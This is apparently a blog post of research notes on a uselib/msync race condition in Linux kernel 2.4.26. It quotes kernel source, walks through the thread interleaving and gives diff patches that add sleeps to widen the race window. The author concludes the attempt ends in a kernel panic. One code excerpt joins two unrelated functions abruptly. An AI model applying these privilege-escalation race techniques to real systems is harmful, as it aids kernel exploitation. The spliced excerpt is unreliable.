uselib/msync exploit in kernel 2.4.26

Race between uselib and msync

One of the interesting features of do_brk is that it can also unmap memory, if called on a region that already posesses a mapping. Therefore, the non-sempahore-protected do_brk in the uselib system call can be used prematurely unmap an arbitrary region of process memory. This comes in handy with the system call msync.

The race window is in msync_interval:

static int msync_interval(struct vm_area_struct * vma,
	unsigned long start, unsigned long end, int flags)
{
	int ret = 0;
	struct file * file = vma->vm_file;

	if ( (flags & MS_INVALIDATE) && (vma->vm_flags & VM_LOCKED) )
		return -EBUSY;

	if (file && (vma->vm_flags & VM_SHARED)) {
		ret = filemap_sync(vma, start, end-start, flags);

		if (!ret && (flags & (MS_SYNC|MS_ASYNC))) {

			struct inode * inode = file->f_dentry->d_inode;

			down(&inode->i_sem);
			ret = filemap_fdatasync(inode->i_mapping);
munmap_back:
	vma = find_vma_prepare(mm, addr, &prev, &rb_link, &rb_parent);
	if (vma && vma->vm_start < addr + len) {
		if (do_munmap(mm, addr, len))
			return -ENOMEM;

Within do_munmap, fput is called, which nulls out f_dentry.

Let's call the address of the contents contents_addr and the address of the bss bss_addr. Our evil lib will have 1 page of contents and 1 page of bss. The interleaving is as follows:

  • t1: mmap 1 page at bss_addr that is backed by some file fd1
  • t1: uselib->mmap contents at contents_addr
  • t2: msync 1 page at bss_addr, SLEEP right before grabbing dentry pointer
  • t1: uselib->do_brk->do_munmap at bss_addr
  • t1: SLEEP sometime before vma_link
  • t2: msync comes out of sleep now and f_dentry has been nulled out
To do this, 2 sleeps are required.

find_vma() locates the first memory region whose vm_end field is greater than addr and returns the address of its descriptor. It should happen before rb_erase().
Note: Parent and child share the same mm_struct. Both zap_page_range() and filemap_sync() need to acquire the page_table_lock.

Patches for Linux/mm/mmap.c and filemap.c respectively.
--- /usr/src/kernel-source-2.4.26/mm/mmap.c	2004-02-18 08:36:32.000000000 -0500
+++ mmap.c	2015-11-28 08:57:50.232849728 -0500
@@ -19,6 +19,10 @@
 #include <asm/uaccess.h>
 #include <asm/pgalloc.h>
 
+/* sleep patch */
+#include <asm-i386/param.h>
+#include <linux/sched.h>
+
 /*
  * WARNING: the debugging will use recursive algorithms so never enable this
  * unless you know what you are doing.
@@ -965,6 +969,10 @@
 
 	npp = (prev ? &prev->vm_next : &mm->mmap);
 	free = NULL;
+	if (addr == 0x60000000 && len == 4096) {
+		set_current_state(TASK_UNINTERRUPTIBLE);
+		schedule_timeout(1 * HZ);
+	}
 	spin_lock(&mm->page_table_lock);
 	for ( ; mpnt && mpnt->vm_start < addr+len; mpnt = *npp) {
 		*npp = mpnt->vm_next;
--- /usr/src/kernel-source-2.4.26/mm/filemap.c	2004-08-24 12:46:28.000000000 -0400
+++ filemap.c	2015-11-28 08:57:57.566734808 -0500
@@ -30,6 +30,10 @@
 
 #include <linux/highmem.h>
 
+/* sleep patch */
+#include <asm-i386/param.h>
+#include <linux/sched.h>
+
 /*
  * Shared mappings implemented 30.11.1994. It's not fully working yet,
  * though.
@@ -2353,6 +2357,8 @@
 		return -EBUSY;
 
 	if (file && (vma->vm_flags & VM_SHARED)) {
+		set_current_state(TASK_UNINTERRUPTIBLE);
+		schedule_timeout(2 * HZ);
 		ret = filemap_sync(vma, start, end-start, flags);
 
 		if (!ret && (flags & (MS_SYNC|MS_ASYNC))) {

The Linux kernel uses a data-structure to keep track of each physical page frame. This data-structure is called a ‘struct page’. These ‘struct page’ objects form an array, named ‘mem_map[]’.

/boot $ grep ‘mem_map’ System.map-2.4.26

After writepage() in filemap_fdatasync, we have a valid_page check in page_cache_release():

if (!VALID_PAGE(page))
	BUG();
VALID_PAGE is a marco defined like this:

((page - mem_map) < max_mapnr)

It's impossible for our fake page to pass this check. Kernel will panic.

Possible window expansion

do_munmap has to call kmem_cache_alloc, therefore we can take advantage of the strategy used in  uselib/mmap exploit
The default allocator for this kernel version is SLAB allocator, there are kernel objects pre-allocated for vma structures. However, when all of slabs containing pre-allocated vmas are full, then the kernel need to allocate new page and create a new slab. Usually, this will return pretty fast. However, if currently no memory is available, the kernel would try to free pages and reclaim memory from caches.
On the other hand, filemap_sync scans the Page Table entries corresponding to the linear address intervals included in the memory region. For each page found, it invokes flush_tlb_page() to flush the corresponding translation lookaside buffers, and marks the page as dirty. So this window could be enlarged. Verify this by using RDTSC instruction.
Note: Most Intel CPUs support out-of-order execution of the code. This feature does not guarantee that the temporal sequence of the single compiled C instructions will respect the sequence of the instruction themselves as written in the source C file. When we call the RDTSC instruction, we pretend that that instruction will be executed exactly at the beginning and at the end of code being measured. Thus, we need to call CPUID just before both RTDSC calls to avoid out of order execution. But there is a lot of variance (in terms of clock cycles) that is intrinsically associated with the CPUID instruction execution itself. That means we lose in terms of measurement resolution when using CPUID.

Nevertheless, even if we succeed in sleeping on kmem_cache_alloc and extending the time taken by filemap_sync, do_munmap is still not able to null out f_dentry since after it wakes up from kmem_cache_alloc the lock is being held by filemap_sync.

Implementation


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值